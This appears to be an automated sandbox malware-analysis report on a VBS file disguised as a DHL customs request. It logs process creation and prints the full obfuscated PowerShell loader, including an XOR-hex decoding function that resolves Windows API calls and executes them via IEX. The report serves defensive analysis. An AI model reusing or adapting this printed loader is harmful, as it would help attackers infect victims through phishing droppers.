Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL-CUSTOMS-REQUEST-802487487001.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Uncolonizing = """ SFKluRenprc Ttloi Ho AnFi MaH LT PB L Ba{Qu Ra Su Au Rp Ba Ar Aa KmAs( G[ OSTht Ir TiDin Wg B] T`$ sPReoSotWooPomcaaMot KoDi7sk) L; M S He M Ud`$TeA EnBgaSlm RnTreUnsFaiSksImn Bc Bh D Tr=Ch MaNKaeanwDr- UOTib ljYee PcSotPr TbSpy It LePh[ C]di m( S`$SeP Bo jtSooCumTaaHutbeoSk7El.DiLHae UnEngFlt FhKr B/Le Ur2 H) S; K Br El D DiFBeo Er P(Al`$roA Tn KaElmUpn YeRasSki CsUb= M0 C; C Au`$CaAHenPaaThmPsnKoeUdsGai XsDe Ex-Val Bt R C`$spPFnoAut coAfmCoaTjtLnoUl7Be. SL Ge HnLygCutCih B; B Cr`$FoAMin Aa ImMen KeZas Ui Rs O+Ec=Bu2Mi)Ke{ P Vi Un`$caD Bo Cg Ab Fe ArWir Ri Me Ds O U= C F`$ SP CobotIdo um SaCetBuo S7Op.YiS MuUnb NsRetReropi CnUtgRe(Sc`$ RASen HaComFan de FssqisusUn, F A2 R) K;El Bo M F De pa B Di Pe`$RiA un Ba Im In Ae AsthiNasHonlsc Dh S[Re`$NaA Gn SatemNan Se FsEni LsPl/ P2 S] G Vo=Va Ud[ PcDuo UnkivExeUnrMetSk]fl: O: STreospBBayAstTeePs( L`$OrDpaoobgStbDee ErTirEri ReexsCa, F Fo1Co6Su)Li; n Vi Tr`$DaAtenCha AmIrnReePosUriHes BnEucDjhMu[Ch`$FdA Bn Sa PmAbn DekisIniDys R/ I2 L]Ga Il= B J(Be`$ NAPrnPaa Um Fn VeUlsLii GsUnn AcFrh U[Mi`$ fA OnStaHum Nn ge Fsupi RsPo/Su2An] S Hy- Pb RxIgoWerSi W1Fo5Ov3 M) E;Gy S Vo T Mo} c Me[ ES GtRurSai GnCog F]En[SpSEkyGrsRet ReRemPi.HvT VeZlxBlt A. PE RnNocTuo mdNaiMan SgSp]ma:Pr: PAGeS SCSuIAeI K. cGFoeDrt US StCrr gi Sn SgSl( T`$ BA HnSuaRem Fn Ne ds Ci DsDenDecOvh h) L;Wh}Tu`$BeUBan Ua OwKlaRorSieAd0No=TiHFaTArB s Co'koCDeA BEar0FoE TA TEPoDJaF SCleF K4reBse7opFSuD TFsc5StFKu5Bs'Bo; M`$ReUTanIna SwCea Ir ieBo1 I=beH JT KBCa St'ArDCa4 MF M0 NFmiA TECaB SFSa6AuE PA BFRu6MaFswFFaE cD HBHe7unCGeEHiF D0FaFTi7 fA MACaA UB CBHk7 FC SCJeFpy7 DE CAVeFTu8 PFSpFImFBiC ODPl7FoFgl8SeE JD WFHi0BjEKlFPsF SCPrD S4 MF ICPrEAmD SFKo1MiF F6ChF SDHeE aAAg' S;fo`$ DU Cn HaCaw Da Sr Ce O2Co= MH RT ABMe m' ND pEPsF UC MEKrD EC K9InETaB HF O6 IF SALeDMi8SpFYdD SFslDAiEMeBAaFFoCHuEAnABrETrARe'Un;St`$InU HnVia SwFlajer Re B3 R= EHReTSpBFo P'HjC UAbaEsi0 TE EA KE BD PF jC UF A4ClB S7 SC SBBiEstC BFLa7hoESkDbjFpr0RuFMo4ReF SCOmBCo7 sDAs0DeFCa7 eEOvD TF PCFiEKuBpaFdi6CiE S9BrC CA FFLoCTyE WB GENeFbrF T0LuFVuA TF fCapE KA SBNo7urD T1 SFEl8EnF K7 NFmlD FFMi5PlFInCBaCAfBSkF NC BF SF a' C;Be`$toUUnn PaSuw baDarAue A4ra=LiHHyT BBSe S' BEUlAViEGoD mEMiBArF D0ScF R7omFRaE B' T;no`$ CUPenNia gw iaTurMeeAv5 G=krHBnT SBRe St'slD EEMaFJaC FESaDSaD A4 LF i6 BFVaDAlEHeCStFUd5AbFFoCLlD o1ImFst8NoFGe7RaF SD SFul5FiF SC F' S;Ad`$hiU Bn KaOpwTua Pr Mepo6Sp=SmHCoTEnB L E' AC eBMeCKiD UC SA TEFa9 AFprC AFPrAStFAt0SoFSe8 WFGi5CoDUn7 RFCo8 MFRe4 AF LCTeBSc5BrBGa9AnDTa1KlFSt0 RFBeD DFTaC ID FB SE U0 KC SA OFMa0 BFTrEDeBNy5 TB b9DeCOx9UvE SCMeFWaB FFPi5RnFSc0PrFDjA B'Bn; E`$ SU DnDkaCowHoa Sr BeBl7Se= FHMeTCoB S H'SpCKaBSkE lC SF f7 FEApD IFOr0 LFAs4GaFAuCSaB p5 YBad9 BD S4PeFAd8UdFLi7AgFAl8TeF OEAnF MCHvFNoDAf' P; F`$CeUWenRea MwDia Fr DeMo8En=ArHmaT SBSk Ce'AnC AB RFTcC KFCoFDmFTa5 MFSeCcaFDjA UEPsDz
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Potomato7); $Anamnesisnch = New-Object byte[] ($Potomato7.Length / 2); For($Anamnesis=0; $Anamnesis -lt $Potomato7.Length; $Anamnesis+=2){ $Dogberries = $Potomato7.Substring($Anamnesis, 2); $Anamnesisnch[$Anamnesis/2] = [convert]::ToByte($Dogberries, 16); $Anamnesisnch[$Anamnesis/2] = ($Anamnesisnch[$Anamnesis/2] -bxor 153); } [String][System.Text.Encoding]::ASCII.GetString($Anamnesisnch);}$Unaware0=HTB 'CAE0EAEDFCF4B7FDF5F5';$Unaware1=HTB 'D4F0FAEBF6EAF6FFEDB7CEF0F7AAABB7CCF7EAF8FFFCD7F8EDF0EFFCD4FCEDF1F6FDEA';$Unaware2=HTB 'DEFCEDC9EBF6FAD8FDFDEBFCEAEA';$Unaware3=HTB 'CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D1F8F7FDF5FCCBFCFF';$Unaware4=HTB 'EAEDEBF0F7FE';$Unaware5=HTB 'DEFCEDD4F6FDECF5FCD1F8F7FDF5FC';$Unaware6=HTB 'CBCDCAE9FCFAF0F8F5D7F8F4FCB5B9D1F0FDFCDBE0CAF0FEB5B9C9ECFBF5F0FA';$Unaware7=HTB 'CBECF7EDF0F4FCB5B9D4F8F7F8FEFCFD';$Unaware8=HTB 'CBFCFFF5FCFAEDFCFDDDFCF5FCFEF8EDFC';$Unaware9=HTB 'D0F7D4FCF4F6EBE0D4F6FDECF5FC';$Demythologizing0=HTB 'D4E0DDFCF5FCFEF8EDFCCDE0E9FC';$Demythologizing1=HTB 'DAF5F8EAEAB5B9C9ECFBF5F0FAB5B9CAFCF8F5FCFDB5B9D8F7EAF0DAF5F8EAEAB5B9D8ECEDF6DAF5F8EAEA';$Demythologizing2=HTB 'D0F7EFF6F2FC';$Demythologizing3=HTB 'C9ECFBF5F0FAB5B9D1F0FDFCDBE0CAF0FEB5B9D7FCEECAF5F6EDB5B9CFF0EBEDECF8F5';$Demythologizing4=HTB 'CFF0EBEDECF8F5D8F5F5F6FA';$Demythologizing5=HTB 'F7EDFDF5F5';$Demythologizing6=HTB 'D7EDC9EBF6EDFCFAEDCFF0EBEDECF8F5D4FCF4F6EBE0';$Demythologizing7=HTB 'D0DCC1';$Demythologizing8=HTB 'C5';$Dissonere=HTB 'CCCADCCBAAAB';$Sanctology=HTB 'DAF8F5F5CEF0F7FDF6EEC9EBF6FAD8';function fkp {Param ($Allocyanine, $unsensualized) ;$Karskade0 =HTB 'BDCCF7EBFCE9EBF6EFFCFDB9A4B9B1C2D8E9E9DDF6F4F8F0F7C4A3A3DAECEBEBFCF7EDDDF6F4F8F0F7B7DEFCEDD8EAEAFCF4FBF5F0FCEAB1B0B9E5B9CEF1FCEBFCB4D6FBF3FCFAEDB9E2B9BDC6B7DEF5F6FBF8F5D8EAEAFCF4FBF5E0DAF8FAF1FCB9B4D8F7FDB9BDC6B7D5F6FAF8EDF0F6F7B7CAE9F5F0EDB1BDDDFCF4E0EDF1F6F5F6FEF0E3F0F7FEA1B0C2B4A8C4B7DCE8ECF8F5EAB1BDCCF7F8EEF8EBFCA9B0B9E4B0B7DEFCEDCDE0E9FCB1BDCCF7F8EEF8EBFCA8B0';&($Demythologizing7) $Karskade0;$Karskade5 = HTB 'BDD2ECEBEFFCF5F8FCF7FEFDFCB9A4B9BDCCF7EBFCE9EBF6EFFCFDB7DEFCEDD4FCEDF1F6FDB1BDCCF7F8EEF8EBFCABB5B9C2CDE0E9FCC2C4C4B9D9B1BDCCF7F8EEF8EBFCAAB5B9BDCCF7F8EEF8EBFCADB0B0';&($Demythologizing7) $Karskade5;$Karskade1 = HTB 'EBFCEDECEBF7B9BDD2ECEBEFFCF5F8FCF7FEFDFCB7D0F7EFF6F2FCB1BDF7ECF5F5B5B9D9B1C2CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D1F8F7FDF5FCCBFCFFC4B1D7FCEEB4D6FBF3FCFAEDB9CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D1F8F7FDF5FCCBFCFFB1B1D7FCEEB4D6FBF3FCFAEDB9D0F7EDC9EDEBB0B5B9B1BDCCF7EBFCE9EBF6EFFCFDB7DEFCEDD4FCEDF1F6FDB1BDCCF7F8EEF8EBFCACB0B0B7D0F7EFF6F2FCB1BDF7ECF5F5B5B9D9B1BDD8F5F5F6FAE0F8F7F0F7FCB0B0B0B0B5B9BDECF7EAFCF7EAECF8F5F0E3FCFDB0B0';&($Demythologizing7) $Karskade1;}function GDT {Param ([Parameter(Position = 0)] [Type[]] $Twentythr
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Uncolonizing = """ SFKluRenprc Ttloi Ho AnFi MaH LT PB L Ba{Qu Ra Su Au Rp Ba Ar Aa KmAs( G[ OSTht Ir TiDin Wg B] T`$ sPReoSotWooPomcaaMot KoDi7sk) L; M S He M Ud`$TeA EnBgaSlm RnTreUnsFaiSksImn Bc Bh D Tr=Ch MaNKaeanwDr- UOTib ljYee PcSotPr TbSpy It LePh[ C]di m( S`$SeP Bo jtSooCumTaaHutbeoSk7El.DiLHae UnEngFlt FhKr B/Le Ur2 H) S; K Br El D DiFBeo Er P(Al`$roA Tn KaElmUpn YeRasSki CsUb= M0 C; C Au`$CaAHenPaaThmPsnKoeUdsGai XsDe Ex-Val Bt R C`$spPFnoAut coAfmCoaTjtLnoUl7Be. SL Ge HnLygCutCih B; B Cr`$FoAMin Aa ImMen KeZas Ui Rs O+Ec=Bu2Mi)Ke{ P Vi Un`$caD Bo Cg Ab Fe ArWir Ri Me Ds O U= C F`$ SP CobotIdo um SaCetBuo S7Op.YiS MuUnb NsRetReropi CnUtgRe(Sc`$ RASen HaComFan de FssqisusUn, F A2 R) K;El Bo M F De pa B Di Pe`$RiA un Ba Im In Ae AsthiNasHonlsc Dh S[Re`$NaA Gn SatemNan Se FsEni LsPl/ P2 S] G Vo=Va Ud[ PcDuo UnkivExeUnrMetSk]fl: O: STreospBBayAstTeePs( L`$OrDpaoobgStbDee ErTirEri ReexsCa, F Fo1Co6Su)Li; n Vi Tr`$DaAtenCha AmIrnReePosUriHes BnEucDjhMu[Ch`$FdA Bn Sa PmAbn DekisIniDys R/ I2 L]Ga Il= B J(Be`$ NAPrnPaa Um Fn VeUlsLii GsUnn AcFrh U[Mi`$ fA OnStaHum Nn ge Fsupi RsPo/Su2An] S Hy- Pb RxIgoWerSi W1Fo5Ov3 M) E;Gy S Vo T Mo} c Me[ ES GtRurSai GnCog F]En[SpSEkyGrsRet ReRemPi.HvT VeZlxBlt A. PE RnNocTuo mdNaiMan SgSp]ma:Pr: PAGeS SCSuIAeI K. cGFoeDrt US StCrr gi Sn SgSl( T`$ BA HnSuaRem Fn Ne ds Ci DsDenDecOvh h) L;Wh}Tu`$BeUBan Ua OwKlaRorSieAd0No=TiHFaTArB s Co'koCDeA BEar0FoE TA TEPoDJaF SCleF K4reBse7opFSuD TFsc5StFKu5Bs'Bo; M`$ReUTanIna SwCea Ir ieBo1 I=beH JT KBCa St'ArDCa4 MF M0 NFmiA TECaB SFSa6AuE PA BFRu6MaFswFFaE cD HBHe7unCGeEHiF D0FaFTi7 fA MACaA UB CBHk7 FC SCJeFpy7 DE CAVeFTu8 PFSpFImFBiC ODPl7FoFgl8SeE JD WFHi0BjEKlFPsF SCPrD S4 MF ICPrEAmD SFKo1MiF F6ChF SDHeE aAAg' S;fo`$ DU Cn HaCaw Da Sr Ce O2Co= MH RT ABMe m' ND pEPsF UC MEKrD EC K9InETaB HF O6 IF SALeDMi8SpFYdD SFslDAiEMeBAaFFoCHuEAnABrETrARe'Un;St`$InU HnVia SwFlajer Re B3 R= EHReTSpBFo P'HjC UAbaEsi0 TE EA KE BD PF jC UF A4ClB S7 SC SBBiEstC BFLa7hoESkDbjFpr0RuFMo4ReF SCOmBCo7 sDAs0DeFCa7 eEOvD TF PCFiEKuBpaFdi6CiE S9BrC CA FFLoCTyE WB GENeFbrF T0LuFVuA TF fCapE KA SBNo7urD T1 SFEl8EnF K7 NFmlD FFMi5PlFInCBaCAfBSkF NC BF SF a' C;Be`$toUUnn PaSuw baDarAue A4ra=LiHHyT BBSe S' BEUlAViEGoD mEMiBArF D0ScF R7omFRaE B' T;no`$ CUPenNia gw iaTurMeeAv5 G=krHBnT SBRe St'slD EEMaFJaC FESaDSaD A4 LF i6 BFVaDAlEHeCStFUd5AbFFoCLlD o1ImFst8NoFGe7RaF SD SFul5FiF SC F' S;Ad`$hiU Bn KaOpwTua Pr Mepo6Sp=SmHCoTEnB L E' AC eBMeCKiD UC SA TEFa9 AFprC AFPrAStFAt0SoFSe8 WFGi5CoDUn7 RFCo8 MFRe4 AF LCTeBSc5BrBGa9AnDTa1KlFSt0 RFBeD DFTaC ID FB SE U0 KC SA OFMa0 BFTrEDeBNy5 TB b9DeCOx9UvE SCMeFWaB FFPi5RnFSc0PrFDjA B'Bn; E`$ SU DnDkaCowHoa Sr BeBl7Se= FHMeTCoB S H'SpCKaBSkE lC SF f7 FEApD IFOr0 LFAs4GaFAuCSaB p5 YBad9 BD S4PeFAd8UdFLi7AgFAl8TeF OEAnF MCHvFNoDAf' P; F`$CeUWenRea MwDia Fr DeMo8En=ArHmaT SBSk Ce'AnC AB RFTcC KFCoFDmFTa5 MFSeCcaFDjA UEPsDzJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Potomato7); $Anamnesisnch = New-Object byte[] ($Potomato7.Length / 2); For($Anamnesis=0; $Anamnesis -lt $Potomato7.Length; $Anamnesis+=2){ $Dogberries = $Potomato7.Substring($Anamnesis, 2); $Anamnesisnch[$Anamnesis/2] = [convert]::ToByte($Dogberries, 16); $Anamnesisnch[$Anamnesis/2] = ($Anamnesisnch[$Anamnesis/2] -bxor 153); } [String][System.Text.Encoding]::ASCII.GetString($Anamnesisnch);}$Unaware0=HTB 'CAE0EAEDFCF4B7FDF5F5';$Unaware1=HTB 'D4F0FAEBF6EAF6FFEDB7CEF0F7AAABB7CCF7EAF8FFFCD7F8EDF0EFFCD4FCEDF1F6FDEA';$Unaware2=HTB 'DEFCEDC9EBF6FAD8FDFDEBFCEAEA';$Unaware3=HTB 'CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D1F8F7FDF5FCCBFCFF';$Unaware4=HTB 'EAEDEBF0F7FE';$Unaware5=HTB 'DEFCEDD4F6FDECF5FCD1F8F7FDF5FC';$Unaware6=HTB 'CBCDCAE9FCFAF0F8F5D7F8F4FCB5B9D1F0FDFCDBE0CAF0FEB5B9C9ECFBF5F0FA';$Unaware7=HTB 'CBECF7EDF0F4FCB5B9D4F8F7F8FEFCFD';$Unaware8=HTB 'CBFCFFF5FCFAEDFCFDDDFCF5FCFEF8EDFC';$Unaware9=HTB 'D0F7D4FCF4F6EBE0D4F6FDECF5FC';$Demythologizing0=HTB 'D4E0DDFCF5FCFEF8EDFCCDE0E9FC';$Demythologizing1=HTB 'DAF5F8EAEAB5B9C9ECFBF5F0FAB5B9CAFCF8F5FCFDB5B9D8F7EAF0DAF5F8EAEAB5B9D8ECEDF6DAF5F8EAEA';$Demythologizing2=HTB 'D0F7EFF6F2FC';$Demythologizing3=HTB 'C9ECFBF5F0FAB5B9D1F0FDFCDBE0CAF0FEB5B9D7FCEECAF5F6EDB5B9CFF0EBEDECF8F5';$Demythologizing4=HTB 'CFF0EBEDECF8F5D8F5F5F6FA';$Demythologizing5=HTB 'F7EDFDF5F5';$Demythologizing6=HTB 'D7EDC9EBF6EDFCFAEDCFF0EBEDECF8F5D4FCF4F6EBE0';$Demythologizing7=HTB 'D0DCC1';$Demythologizing8=HTB 'C5';$Dissonere=HTB 'CCCADCCBAAAB';$Sanctology=HTB 'DAF8F5F5CEF0F7FDF6EEC9EBF6FAD8';function fkp {Param ($Allocyanine, $unsensualized) ;$Karskade0 =HTB 'BDCCF7EBFCE9EBF6EFFCFDB9A4B9B1C2D8E9E9DDF6F4F8F0F7C4A3A3DAECEBEBFCF7EDDDF6F4F8F0F7B7DEFCEDD8EAEAFCF4FBF5F0FCEAB1B0B9E5B9CEF1FCEBFCB4D6FBF3FCFAEDB9E2B9BDC6B7DEF5F6FBF8F5D8EAEAFCF4FBF5E0DAF8FAF1FCB9B4D8F7FDB9BDC6B7D5F6FAF8EDF0F6F7B7CAE9F5F0EDB1BDDDFCF4E0EDF1F6F5F6FEF0E3F0F7FEA1B0C2B4A8C4B7DCE8ECF8F5EAB1BDCCF7F8EEF8EBFCA9B0B9E4B0B7DEFCEDCDE0E9FCB1BDCCF7F8EEF8EBFCA8B0';&($Demythologizing7) $Karskade0;$Karskade5 = HTB 'BDD2ECEBEFFCF5F8FCF7FEFDFCB9A4B9BDCCF7EBFCE9EBF6EFFCFDB7DEFCEDD4FCEDF1F6FDB1BDCCF7F8EEF8EBFCABB5B9C2CDE0E9FCC2C4C4B9D9B1BDCCF7F8EEF8EBFCAAB5B9BDCCF7F8EEF8EBFCADB0B0';&($Demythologizing7) $Karskade5;$Karskade1 = HTB 'EBFCEDECEBF7B9BDD2ECEBEFFCF5F8FCF7FEFDFCB7D0F7EFF6F2FCB1BDF7ECF5F5B5B9D9B1C2CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D1F8F7FDF5FCCBFCFFC4B1D7FCEEB4D6FBF3FCFAEDB9CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D1F8F7FDF5FCCBFCFFB1B1D7FCEEB4D6FBF3FCFAEDB9D0F7EDC9EDEBB0B5B9B1BDCCF7EBFCE9EBF6EFFCFDB7DEFCEDD4FCEDF1F6FDB1BDCCF7F8EEF8EBFCACB0B0B7D0F7EFF6F2FCB1BDF7ECF5F5B5B9D9B1BDD8F5F5F6FAE0F8F7F0F7FCB0B0B0B0B5B9BDECF7EAFCF7EAECF8F5F0E3FCFDB0B0';&($Demythologizing7) $Karskade1;}function GDT {Param ([Parameter(Position = 0)] [Type[]] $TwentythrJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3492:120:WilError_01
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL-CUSTOMS-REQUEST-802487487001.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmjiu2qn.f3p.ps1Jump to behavior
Source: classification engineClassification label: mal68.evad.winVBS@6/2@0/0
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: DHL-CUSTOMS-REQUEST-802487487001.vbsStatic file information: File size 1608252 > 1048576

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "$Uncolonizing = """ SFKluRenprc Ttloi Ho AnFi MaH LT PB L Ba{Qu Ra Su Au Rp Ba Ar Aa KmAs( G[ OSTht ", "0")
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Uncolonizing = """ SFKluRenprc Ttloi Ho AnFi MaH LT PB L Ba{Qu Ra Su Au Rp Ba Ar Aa KmAs( G[ OSTht Ir TiDin Wg B] T`$ sPReoSotWooPomcaaMot KoDi7sk) L; M S He M Ud`$TeA EnBgaSlm RnTreUnsFaiSksImn Bc Bh D Tr=Ch MaNKaeanwDr- UOTib ljYee PcSotPr TbSpy It LePh[ C]di m( S`$SeP Bo jtSooCumTaaHutbeoSk7El.DiLHae UnEngFlt FhKr B/Le Ur2 H) S; K Br El D DiFBeo Er P(Al`$roA Tn KaElmUpn YeRasSki CsUb= M0 C; C Au`$CaAHenPaaThmPsnKoeUdsGai XsDe Ex-Val Bt R C`$spPFnoAut coAfmCoaTjtLnoUl7Be. SL Ge HnLygCutCih B; B Cr`$FoAMin Aa ImMen KeZas Ui Rs O+Ec=Bu2Mi)Ke{ P Vi Un`$caD Bo Cg Ab Fe ArWir Ri Me Ds O U= C F`$ SP CobotIdo um SaCetBuo S7Op.YiS MuUnb NsRetReropi CnUtgRe(Sc`$ RASen HaComFan de FssqisusUn, F A2 R) K;El Bo M F De pa B Di Pe`$RiA un Ba Im In Ae AsthiNasHonlsc Dh S[Re`$NaA Gn SatemNan Se FsEni LsPl/ P2 S] G Vo=Va Ud[ PcDuo UnkivExeUnrMetSk]fl: O: STreospBBayAstTeePs( L`$OrDpaoobgStbDee ErTirEri ReexsCa, F Fo1Co6Su)Li; n Vi Tr`$DaAtenCha AmIrnReePosUriHes BnEucDjhMu[Ch`$FdA Bn Sa PmAbn DekisIniDys R/ I2 L]Ga Il= B J(Be`$ NAPrnPaa Um Fn VeUlsLii GsUnn AcFrh U[Mi`$ fA OnStaHum Nn ge Fsupi RsPo/Su2An] S Hy- Pb RxIgoWerSi W1Fo5Ov3 M) E;Gy S Vo T Mo} c Me[ ES GtRurSai GnCog F]En[SpSEkyGrsRet ReRemPi.HvT VeZlxBlt A. PE RnNocTuo mdNaiMan SgSp]ma:Pr: PAGeS SCSuIAeI K. cGFoeDrt US StCrr gi Sn SgSl( T`$ BA HnSuaRem Fn Ne ds Ci DsDenDecOvh h) L;Wh}Tu`$BeUBan Ua OwKlaRorSieAd0No=TiHFaTArB s Co'koCDeA BEar0FoE TA TEPoDJaF SCleF K4reBse7opFSuD TFsc5StFKu5Bs'Bo; M`$ReUTanIna SwCea Ir ieBo1 I=beH JT KBCa St'ArDCa4 MF M0 NFmiA TECaB SFSa6AuE PA BFRu6MaFswFFaE cD HBHe7unCGeEHiF D0FaFTi7 fA MACaA UB CBHk7 FC SCJeFpy7 DE CAVeFTu8 PFSpFImFBiC ODPl7FoFgl8SeE JD WFHi0BjEKlFPsF SCPrD S4 MF ICPrEAmD SFKo1MiF F6ChF SDHeE aAAg' S;fo`$ DU Cn HaCaw Da Sr Ce O2Co= MH RT ABMe m' ND pEPsF UC MEKrD EC K9InETaB HF O6 IF SALeDMi8SpFYdD SFslDAiEMeBAaFFoCHuEAnABrETrARe'Un;St`$InU HnVia SwFlajer Re B3 R= EHReTSpBFo P'HjC UAbaEsi0 TE EA KE BD PF jC UF A4ClB S7 SC SBBiEstC BFLa7hoESkDbjFpr0RuFMo4ReF SCOmBCo7 sDAs0DeFCa7 eEOvD TF PCFiEKuBpaFdi6CiE S9BrC CA FFLoCTyE WB GENeFbrF T0LuFVuA TF fCapE KA SBNo7urD T1 SFEl8EnF K7 NFmlD FFMi5PlFInCBaCAfBSkF NC BF SF a' C;Be`$toUUnn PaSuw baDarAue A4ra=LiHHyT BBSe S' BEUlAViEGoD mEMiBArF D0ScF R7omFRaE B' T;no`$ CUPenNia gw iaTurMeeAv5 G=krHBnT SBRe St'slD EEMaFJaC FESaDSaD A4 LF i6 BFVaDAlEHeCStFUd5AbFFoCLlD o1ImFst8NoFGe7RaF SD SFul5FiF SC F' S;Ad`$hiU Bn KaOpwTua Pr Mepo6Sp=SmHCoTEnB L E' AC eBMeCKiD UC SA TEFa9 AFprC AFPrAStFAt0SoFSe8 WFGi5CoDUn7 RFCo8 MFRe4 AF LCTeBSc5BrBGa9AnDTa1KlFSt0 RFBeD DFTaC ID FB SE U0 KC SA OFMa0 BFTrEDeBNy5 TB b9DeCOx9UvE SCMeFWaB FFPi5RnFSc0PrFDjA B'Bn; E`$ SU DnDkaCowHoa Sr BeBl7Se= FHMeTCoB S H'SpCKaBSkE lC SF f7 FEApD IFOr0 LFAs4GaFAuCSaB p5 YBad9 BD S4PeFAd8UdFLi7AgFAl8TeF OEAnF MCHvFNoDAf' P; F`$CeUWenRea MwDia Fr DeMo8En=ArHmaT SBSk Ce'AnC AB RFTcC KFCoFDmFTa5 MFSeCcaFDjA UEPsDz
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Uncolonizing = """ SFKluRenprc Ttloi Ho AnFi MaH LT PB L Ba{Qu Ra Su Au Rp Ba Ar Aa KmAs( G[ OSTht Ir TiDin Wg B] T`$ sPReoSotWooPomcaaMot KoDi7sk) L; M S He M Ud`$TeA EnBgaSlm RnTreUnsFaiSksImn Bc Bh D Tr=Ch MaNKaeanwDr- UOTib ljYee PcSotPr TbSpy It LePh[ C]di m( S`$SeP Bo jtSooCumTaaHutbeoSk7El.DiLHae UnEngFlt FhKr B/Le Ur2 H) S; K Br El D DiFBeo Er P(Al`$roA Tn KaElmUpn YeRasSki CsUb= M0 C; C Au`$CaAHenPaaThmPsnKoeUdsGai XsDe Ex-Val Bt R C`$spPFnoAut coAfmCoaTjtLnoUl7Be. SL Ge HnLygCutCih B; B Cr`$FoAMin Aa ImMen KeZas Ui Rs O+Ec=Bu2Mi)Ke{ P Vi Un`$caD Bo Cg Ab Fe ArWir Ri Me Ds O U= C F`$ SP CobotIdo um SaCetBuo S7Op.YiS MuUnb NsRetReropi CnUtgRe(Sc`$ RASen HaComFan de FssqisusUn, F A2 R) K;El Bo M F De pa B Di Pe`$RiA un Ba Im In Ae AsthiNasHonlsc Dh S[Re`$NaA Gn SatemNan Se FsEni LsPl/ P2 S] G Vo=Va Ud[ PcDuo UnkivExeUnrMetSk]fl: O: STreospBBayAstTeePs( L`$OrDpaoobgStbDee ErTirEri ReexsCa, F Fo1Co6Su)Li; n Vi Tr`$DaAtenCha AmIrnReePosUriHes BnEucDjhMu[Ch`$FdA Bn Sa PmAbn DekisIniDys R/ I2 L]Ga Il= B J(Be`$ NAPrnPaa Um Fn VeUlsLii GsUnn AcFrh U[Mi`$ fA OnStaHum Nn ge Fsupi RsPo/Su2An] S Hy- Pb RxIgoWerSi W1Fo5Ov3 M) E;Gy S Vo T Mo} c Me[ ES GtRurSai GnCog F]En[SpSEkyGrsRet ReRemPi.HvT VeZlxBlt A. PE RnNocTuo mdNaiMan SgSp]ma:Pr: PAGeS SCSuIAeI K. cGFoeDrt US StCrr gi Sn SgSl( T`$ BA HnSuaRem Fn Ne ds Ci DsDenDecOvh h) L;Wh}Tu`$BeUBan Ua OwKlaRorSieAd0No=TiHFaTArB s Co'koCDeA BEar0FoE TA TEPoDJaF SCleF K4reBse7opFSuD TFsc5StFKu5Bs'Bo; M`$ReUTanIna SwCea Ir ieBo1 I=beH JT KBCa St'ArDCa4 MF M0 NFmiA TECaB SFSa6AuE PA BFRu6MaFswFFaE cD HBHe7unCGeEHiF D0FaFTi7 fA MACaA UB CBHk7 FC SCJeFpy7 DE CAVeFTu8 PFSpFImFBiC ODPl7FoFgl8SeE JD WFHi0BjEKlFPsF SCPrD S4 MF ICPrEAmD SFKo1MiF F6ChF SDHeE aAAg' S;fo`$ DU Cn HaCaw Da Sr Ce O2Co= MH RT ABMe m' ND pEPsF UC MEKrD EC K9InETaB HF O6 IF SALeDMi8SpFYdD SFslDAiEMeBAaFFoCHuEAnABrETrARe'Un;St`$InU HnVia SwFlajer Re B3 R= EHReTSpBFo P'HjC UAbaEsi0 